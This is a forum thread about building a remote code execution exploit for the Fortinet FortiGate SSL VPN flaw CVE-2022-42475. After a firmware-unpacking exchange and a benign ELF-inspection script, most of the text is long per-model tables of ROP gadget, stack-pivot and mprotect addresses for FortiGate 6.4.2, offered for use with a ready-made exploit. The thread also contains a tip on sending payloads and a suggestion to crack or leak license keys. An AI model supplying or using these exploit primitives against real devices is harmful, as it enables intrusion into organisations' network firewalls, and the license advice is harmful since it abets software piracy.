
Remote Producing a POC for CVE-2022-42475 (Fortinet RCE)

Problems unpacking bin.tar.xz
After mounting the .vmdk and unpacking the rootfs, I found the xz binary in the /sbin directory. I don't understand why it gives an error when I run it.
readelf:
[readelf output was attached as a screenshot]


uname -a:
Linux 5.19.0-41-generic #42~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 18 17:40:00 UTC 2 x86_64 x86_64 x86_64 GNU/Linux


Help me out please.
 
Found the solution:

patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz
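Why the binary "does not exist" even though it is right there, as an added example that is not part of either post above: when a dynamically linked ELF is executed, the kernel first loads the program interpreter named in its PT_INTERP segment, and a binary lifted out of a firmware rootfs usually names a loader path that only exists inside that rootfs, so the ENOENT you see is for the loader, not for the binary. The Python script below parses PT_INTERP from an ELF64 little-endian image (matching the x86_64 host in the uname output) and reports whether that loader exists on the host; it builds a small constructed ELF image inline so it runs without a real firmware file, and the firmware loader path used in it is made up for the demo.

```python
"""Added example (not from the thread): explain the 'No such file or directory'
error on an ELF that clearly exists, by reading its PT_INTERP program header.

Assumptions: ELF64, little-endian (x86-64 as in the uname above); the loader
paths used at the bottom are constructed for the demo, not real firmware paths."""
import os
import struct

ELF_MAGIC = b"\x7fELF"
PT_INTERP = 3          # program header type of the interpreter path segment
EHDR_SIZE = 64         # sizeof(Elf64_Ehdr)
PHDR_SIZE = 56         # sizeof(Elf64_Phdr)


def elf_interpreter(data: bytes):
    """Return the PT_INTERP path of an ELF64 LE image, or None if it has none (static)."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian is handled in this example")
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        # Elf64_Phdr prefix: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz
        p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:
            return data[p_offset:p_offset + p_filesz].rstrip(b"\0").decode()
    return None


def diagnose(data: bytes, host_root: str = "/") -> str:
    """Say whether the loader the binary asks for exists under host_root."""
    interp = elf_interpreter(data)
    if interp is None:
        return "static binary: no interpreter needed"
    host_path = os.path.join(host_root, interp.lstrip("/"))
    if os.path.exists(host_path):
        return f"interpreter present: {interp}"
    return (f"interpreter missing on host: {interp} "
            "(ENOENT refers to the loader, not the binary; point it at a host loader "
            "with patchelf --set-interpreter, or invoke the rootfs's own ld.so directly)")


def build_fake_elf(interp=None) -> bytes:
    """Constructed, non-runnable ELF64 image: a header plus, optionally, one
    PT_INTERP segment. Exists only so the example runs without a firmware binary."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8   # 64-bit, LE, ELF version 1
    phnum = 0 if interp is None else 1
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH",
                                 2, 0x3E, 1, 0,             # ET_EXEC, EM_X86_64, version, entry
                                 EHDR_SIZE, 0, 0,           # e_phoff, e_shoff, e_flags
                                 EHDR_SIZE, PHDR_SIZE, phnum, 0, 0, 0)
    if interp is None:
        return ehdr
    path = interp.encode() + b"\0"
    phdr = struct.pack("<IIQQQQQQ", PT_INTERP, 4, EHDR_SIZE + PHDR_SIZE,
                       0, 0, len(path), len(path), 1)
    return ehdr + phdr + path


if __name__ == "__main__":
    # Constructed sample: a loader path that would live only inside a firmware rootfs.
    # On a real file use: diagnose(open("rootfs/sbin/xz", "rb").read())
    print(diagnose(build_fake_elf("/lib/ld-firmware-x86-64.so.2")))
    print(diagnose(build_fake_elf()))
```

Running it on the extracted binary instead of the constructed image tells you up front whether patchelf is needed at all; the other standard option, which leaves the file untouched, is to run the rootfs's own glibc loader with the binary as its argument (`./rootfs/lib64/ld-linux-x86-64.so.2 --library-path ./rootfs/lib64 ./rootfs/sbin/xz`), which also keeps the binary linked against the firmware's libc rather than the host's.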
 
I was testing mostly before 6.0.3 because they patched the smartctl replacement trick after that. Getting the firmware files themselves is annoying.
I have access to all versions, but they are all trial. I assume the SSL VPN logic, both the code and the feature, is cut out of the trial license?
 
It needs to be activated but you can crack it or find a leaked license without much trouble.
 
Please note that this user is banned.
Hi

When you read the writeups about this vuln, you will find out that you need a stack pivot gadget to migrate rsp so you can replace your ROP chain.

If anybody needs them, I will share all the stack pivot gadget addresses for FortiGate version 6.4 (all device types with a software version matching 6.4.x).


Code:
Version: 6.4.2
Device : FGT_1100E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e87c
Version: 6.4.2
Device : FGT_1101E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76cc
Version: 6.4.2
Device : FGT_1200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b2fdc
Version: 6.4.2
Device : FGT_140E
Version: 6.4.2
Device : FGT_1500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3f6c
Version: 6.4.2
Device : FGT_1500DT
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b3dfc
Version: 6.4.2
Device : FGT_2000E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c617c
Version: 6.4.2
Device : FGT_200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162295c
Version: 6.4.2
Device : FGT_201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016ba9ec
Version: 6.4.2
Device : FGT_2200E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162e89c
Version: 6.4.2
Device : FGT_2201E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c76dc
Version: 6.4.2
Device : FGT_2500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c66dc
Version: 6.4.2
Device : FGT_3000D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_300D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bcc
Version: 6.4.2
Device : FGT_300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c06c
Version: 6.4.2
Device : FGT_301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4e6c
Version: 6.4.2
Device : FGT_3100D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016bfe1c
Version: 6.4.2
Device : FGT_3200D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0c5c
Version: 6.4.2
Device : FGT_3300E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b86c
Version: 6.4.2
Device : FGT_3301E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d46ac
Version: 6.4.2
Device : FGT_3400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163ba6c
Version: 6.4.2
Device : FGT_3601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016d44ac
Version: 6.4.2
Device : FGT_3700D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0cbc
Version: 6.4.2
Device : FGT_3800D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c2d9c
Version: 6.4.2
Device : FGT_3810D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0e6c
Version: 6.4.2
Device : FGT_3815D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0dbc
Version: 6.4.2
Device : FGT_3960E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_3980E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
Version: 6.4.2
Device : FGT_400D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001618bec
Version: 6.4.2
Device : FGT_400E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c20c
Version: 6.4.2
Device : FGT_401E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c500c
Version: 6.4.2
Device : FGT_5001D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015bab4c
Version: 6.4.2
Device : FGT_5001E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001532b6c
Version: 6.4.2
Device : FGT_5001E1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015ca6cc
Version: 6.4.2
Device : FGT_500D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bbc
Version: 6.4.2
Device : FGT_500E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162bf7c
Version: 6.4.2
Device : FGT_501E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4d8c
Version: 6.4.2
Device : FGT_600D
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0c9c
Version: 6.4.2
Device : FGT_600E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c11c
Version: 6.4.2
Device : FGT_601E
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4f2c


Also remember it's better to send your payloads over an SSL socket, not in HTTPS request format with curl or any other requesting library.

happy hacking
 

Hi all

In this post I will speak more about exploiting this vuln (and also some hints for Xortigate) on real devices.

As you may know, FortiGate has more than 65 products in each version, and every product has more than 35 software update firmwares.

They also have different kinds of arch in their devices: x86, arm32 and aarch64 for some models.

Most devices now are x86 and arm32 in firmware arch, but models like 40F, 60F, 100D have fsoc4, which uses the aarch64 architecture.

Each firmware version has its own addresses for functions and ROP chains.

So you need to explore all 2800 (product * software version) combinations to achieve code execution successfully.

As you saw in the last post, I published the stack pivot gadget for 6.4.x models.

In this post I send all the function addresses you will need, and also the ROP addresses to use in your exploit, for 6.4.2.

Code:
Version: 6.4.2
Device : FGT_3810D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000023852d0
ret: 0x000000000056e466
pop rax ; ret: 0x0000000002db3a7a
and rax, rdi ; ret: 0x000000000232a6ba
pop rbx ; ret: 0x00000000017a0623
mov rdi, rax ; call rbx: 0x0000000001977751
pop rsi ; ret: 0x0000000001d6076c
pop rdx ; ret: 0x00000000027444c6
jmp rax: 0x000000000144ba34
jmp rsp: 0x0000000002e181d2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0e6c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162130d
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_3815D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002385240
ret: 0x00000000016c97dd
pop rax ; ret: 0x0000000002db38fa
and rax, rdi ; ret: 0x000000000232a62a
pop rbx ; ret: 0x0000000002219bb0
mov rdi, rax ; call rbx: 0x00000000019776a1
pop rsi ; ret: 0x0000000001d606dc
pop rdx ; ret: 0x0000000002ded3de
jmp rax: 0x000000000144b984
jmp rsp: 0x0000000002e179a2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c0dbc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162125d
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_3960E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000022aed30
ret: 0x0000000001acf0dd
pop rax ; ret: 0x0000000002fcdbb6
and rax, rdi ; ret: 0x000000000225411a
pop rbx ; ret: 0x00000000021436a0
mov rdi, rax ; call rbx: 0x00000000018cb271
pop rsi ; ret: 0x0000000001ca3a5c
pop rdx ; ret: 0x0000000000609a5d
jmp rax: 0x00000000013ca964
jmp rsp: 0x0000000002c9fbfa
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000159b5bd
VMDK Results:
AES_set_decrypt_key: 427b40:
mprotect: 427c10:
AES_cbc_encrypt: 429f50:
calloc: 42a130:

Version: 6.4.2
Device : FGT_3980E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000022afc10
ret: 0x0000000001acf89d
pop rax ; ret: 0x0000000002d3acad
and rax, rdi ; ret: 0x0000000002254ffa
pop rbx ; ret: 0x0000000002144580
mov rdi, rax ; call rbx: 0x00000000018cb9f1
pop rsi ; ret: 0x0000000001ca489c
pop rdx ; ret: 0x0000000000609a5d
jmp rax: 0x00000000013ca964
jmp rsp: 0x0000000002ca0eb2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000163b11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000159b5bd
VMDK Results:
AES_set_decrypt_key: 427b40:
mprotect: 427c10:
AES_cbc_encrypt: 429f50:
calloc: 42a130:

Version: 6.4.2
Device : FGT_400D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002268990
ret: 0x0000000002e048b5
pop rax ; ret: 0x0000000002f99fa6
and rax, rdi ; ret: 0x000000000220dd7a
pop rbx ; ret: 0x0000000002110a4b
mov rdi, rax ; call rbx: 0x00000000019648f0
pop rsi ; ret: 0x0000000001c6f07c
pop rdx ; ret: 0x0000000002c21976
jmp rax: 0x00000000013a8564
jmp rsp: 0x0000000002c47532
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001618bec
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000157918d
VMDK Results:
AES_set_decrypt_key: 427b20:
mprotect: 427bf0:
AES_cbc_encrypt: 429f30:
calloc: 42a110:

Version: 6.4.2
Device : FGT_400E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002285820
ret: 0x0000000001ab6b54
pop rax ; ret: 0x0000000002c0773a
and rax, rdi ; ret: 0x000000000222ac0a
pop rbx ; ret: 0x000000000211a190
mov rdi, rax ; call rbx: 0x00000000018b3bb1
pop rsi ; ret: 0x0000000001c86f0c
pop rdx ; ret: 0x0000000002c4697e
jmp rax: 0x00000000013bbb84
jmp rsp: 0x0000000002c6d67a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c20c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c7ad
VMDK Results:
AES_set_decrypt_key: 427ae0:
mprotect: 427bb0:
AES_cbc_encrypt: 429ef0:
calloc: 42a0d0:

Version: 6.4.2
Device : FGT_401E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000236de50
ret: 0x0000000001e081ed
pop rax ; ret: 0x0000000002dfd49a
and rax, rdi ; ret: 0x000000000231323a
pop rbx ; ret: 0x00000000022027c0
mov rdi, rax ; call rbx: 0x00000000019731f1
pop rsi ; ret: 0x0000000001d560ac
pop rdx ; ret: 0x0000000002dd607e
jmp rax: 0x000000000144fd04
jmp rsp: 0x0000000002dfda4a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c500c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016255ad
VMDK Results:
AES_set_decrypt_key: 429ab0:
mprotect: 429b90:
AES_cbc_encrypt: 42c020:
calloc: 42c220:

Version: 6.4.2
Device : FGT_5001D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000220db90
ret: 0x0000000001a78ca4
pop rax ; ret: 0x000000000259e20a
and rax, rdi ; ret: 0x00000000021b2f7a
pop rbx ; ret: 0x00000000020a2500
mov rdi, rax ; call rbx: 0x000000000193b530
pop rsi ; ret: 0x0000000001c3e56c
pop rdx ; ret: 0x0000000002898638
jmp rax: 0x0000000001345624
jmp rsp: 0x0000000002c5b365
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015bab4c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000151afed
VMDK Results:
AES_set_decrypt_key: 429ba0:
mprotect: 429c80:
AES_cbc_encrypt: 42c110:
calloc: 42c310:

Version: 6.4.2
Device : FGT_5001E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002134e90
ret: 0x00000000020ac859
pop rax ; ret: 0x0000000002cafbc4
and rax, rdi ; ret: 0x00000000020da27a
pop rbx ; ret: 0x0000000001fc9800
mov rdi, rax ; call rbx: 0x000000000188a1e0
pop rsi ; ret: 0x0000000001b7f14c
pop rdx ; ret: 0x0000000002a38521
jmp rax: 0x00000000012c22c4
jmp rsp: 0x0000000002ac2e0d
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x0000000001532b6c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000149300d
VMDK Results:
AES_set_decrypt_key: 427b80:
mprotect: 427c50:
AES_cbc_encrypt: 429fa0:
calloc: 42a180:

Version: 6.4.2
Device : FGT_5001E1
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000221ba30
ret: 0x00000000019e1996
pop rax ; ret: 0x00000000025af0ea
and rax, rdi ; ret: 0x00000000021c0e1a
pop rbx ; ret: 0x00000000020b03a0
mov rdi, rax ; call rbx: 0x0000000001e03bf0
pop rsi ; ret: 0x0000000001c4c86c
pop rdx ; ret: 0x0000000002c373d6
jmp rax: 0x00000000013551a4
jmp rsp: 0x0000000002c54cb1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000015ca6cc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000152ab6d
VMDK Results:
AES_set_decrypt_key: 429b50:
mprotect: 429c30:
AES_cbc_encrypt: 42c0d0:
calloc: 42c2d0:

Version: 6.4.2
Device : FGT_500D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002350000
ret: 0x0000000001d408c9
pop rax ; ret: 0x000000000311bb36
and rax, rdi ; ret: 0x00000000022f53ea
pop rbx ; ret: 0x00000000021e4970
mov rdi, rax ; call rbx: 0x0000000001a258f0
pop rsi ; ret: 0x0000000001d3d27c
pop rdx ; ret: 0x0000000002db022e
jmp rax: 0x000000000143b8b4
jmp rsp: 0x0000000002dd701a
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0bbc
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000161115d
VMDK Results:
AES_set_decrypt_key: 429af0:
mprotect: 429bd0:
AES_cbc_encrypt: 42c060:
calloc: 42c260:

Version: 6.4.2
Device : FGT_500E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002283ab0
ret: 0x0000000000b06dd8
pop rax ; ret: 0x0000000002c6a112
and rax, rdi ; ret: 0x0000000002228e9a
pop rbx ; ret: 0x0000000002118420
mov rdi, rax ; call rbx: 0x00000000018b3f21
pop rsi ; ret: 0x0000000001c8620c
pop rdx ; ret: 0x0000000002f3d2fc
jmp rax: 0x00000000013bb8f4
jmp rsp: 0x0000000002c6a582
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162bf7c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c51d
VMDK Results:
AES_set_decrypt_key: 427aa0:
mprotect: 427b70:
AES_cbc_encrypt: 429eb0:
calloc: 42a090:

Version: 6.4.2
Device : FGT_501E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x00000000023690b0
ret: 0x0000000001d58999
pop rax ; ret: 0x0000000002df741a
and rax, rdi ; ret: 0x000000000230e49a
pop rbx ; ret: 0x00000000021fda20
mov rdi, rax ; call rbx: 0x0000000001973581
pop rsi ; ret: 0x0000000001d5534c
pop rdx ; ret: 0x000000000272a8e6
jmp rax: 0x000000000144fa84
jmp rsp: 0x0000000002df72a2
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4d8c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162532d
VMDK Results:
AES_set_decrypt_key: 429a60:
mprotect: 429b40:
AES_cbc_encrypt: 42bfd0:
calloc: 42c1d0:

Version: 6.4.2
Device : FGT_600D
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000234fff0
ret: 0x0000000001d409a9
pop rax ; ret: 0x000000000311bd15
and rax, rdi ; ret: 0x00000000022f53da
pop rbx ; ret: 0x00000000021e4960
mov rdi, rax ; call rbx: 0x0000000001a25920
pop rsi ; ret: 0x0000000001d3d35c
pop rdx ; ret: 0x000000000270d6a6
jmp rax: 0x000000000143b9a4
jmp rsp: 0x0000000002dcc2b1
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016b0c9c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000161123d
VMDK Results:
AES_set_decrypt_key: 429af0:
mprotect: 429bd0:
AES_cbc_encrypt: 42c060:
calloc: 42c260:

Version: 6.4.2
Device : FGT_600E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x0000000002284900
ret: 0x0000000000aa5cd0
pop rax ; ret: 0x0000000002f90d06
and rax, rdi ; ret: 0x0000000002229cea
pop rbx ; ret: 0x0000000002119270
mov rdi, rax ; call rbx: 0x00000000018b3a01
pop rsi ; ret: 0x0000000001c85fec
pop rdx ; ret: 0x0000000002c45a9e
jmp rax: 0x00000000013bba94
jmp rsp: 0x0000000002c6c762
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000162c11c
push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x000000000158c6bd
VMDK Results:
AES_set_decrypt_key: 427ae0:
mprotect: 427bb0:
AES_cbc_encrypt: 429ef0:
calloc: 42a0d0:

Version: 6.4.2
Device : FGT_601E
ROP Gadgets and Addresses:
push rdx ; adc byte [rbx + 0x41], bl ; pop rsp; pop rbp ; ret: None
add rsp, 0x18 ; ret: 0x000000000236cf50
ret: 0x0000000001bb467d
pop rax ; ret: 0x0000000002dfc68a
and rax, rdi ; ret: 0x000000000231233a
pop rbx ; ret: 0x00000000022018c0
mov rdi, rax ; call rbx: 0x0000000001973061
pop rsi ; ret: 0x0000000001d551ac
pop rdx ; ret: 0x0000000002dd5916
jmp rax: 0x000000000144fc24
jmp rsp: 0x0000000002dfc799
push rdx ; adc byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016c4f2c
